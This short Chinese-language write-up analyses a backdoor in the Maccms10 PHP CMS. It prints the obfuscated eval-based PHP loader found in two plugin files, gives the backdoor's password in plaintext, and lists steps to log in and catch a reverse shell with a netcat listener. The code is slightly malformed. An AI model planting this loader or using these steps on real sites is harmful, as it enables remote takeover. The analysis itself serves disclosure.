Maccms 后门分析
Maccms网站基于php+mysql的系统,有易用性、功能良好等优点,用途广泛
打开源码
maccms10extendQcloudSmssms.php是一个后门
maccms10extendupyunsrcUpyunApiformat.php也是一个后门
可以看到两者内容一样
<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";//密码WorldFilledWithLove
function s{
$str=”编码之后的恶意代码”;
$str = str_rot13($str);//对恶意代码进行ROT13编码
m($str);
}
function m($str){
global $password;
$jj = '';
eval($jj.pack('H*',$str).$jj);//对混淆的php进行解码,解码之后的代码执行对eval函数的解析
}
s();
?>
访问
解码后的密码敲进去WorldFilledWithLove
反弹shell(将肉鸡/目标机上的终端或者解析器或shell弹到攻击者的电脑中,需要攻击者提前监听,使用NC监听:nc –lvvp 7777,-l)